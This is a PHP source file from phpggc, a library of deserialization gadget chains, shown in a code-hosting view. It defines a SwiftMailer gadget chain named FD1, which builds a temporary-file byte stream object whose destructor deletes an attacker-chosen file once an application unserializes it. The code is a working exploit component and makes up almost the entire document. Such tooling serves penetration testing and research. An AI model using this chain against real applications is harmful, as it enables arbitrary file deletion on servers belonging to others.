Codebase list phpggc / a98ae3d2-7565-48f5-a1e9-9413a1e65feb/main gadgetchains / SwiftMailer / FD / 1 / chain.php
a98ae3d2-7565-48f5-a1e9-9413a1e65feb/main

Tree @a98ae3d2-7565-48f5-a1e9-9413a1e65feb/main (Download .tar.gz)

chain.php @a98ae3d2-7565-48f5-a1e9-9413a1e65feb/mainraw · history · blame

<?php

namespace GadgetChain\SwiftMailer;

class FD1 extends \PHPGGC\GadgetChain\FileDelete
{
    public static $version = '-5.4.12+, -6.2.1+';
    public static $vector = '__destruct';
    public static $author = 'dsp25no';

    public function generate(array $parameters)
    {
        return new \Swift_ByteStream_TemporaryFileByteStream($parameters['remote_path']);
    }
}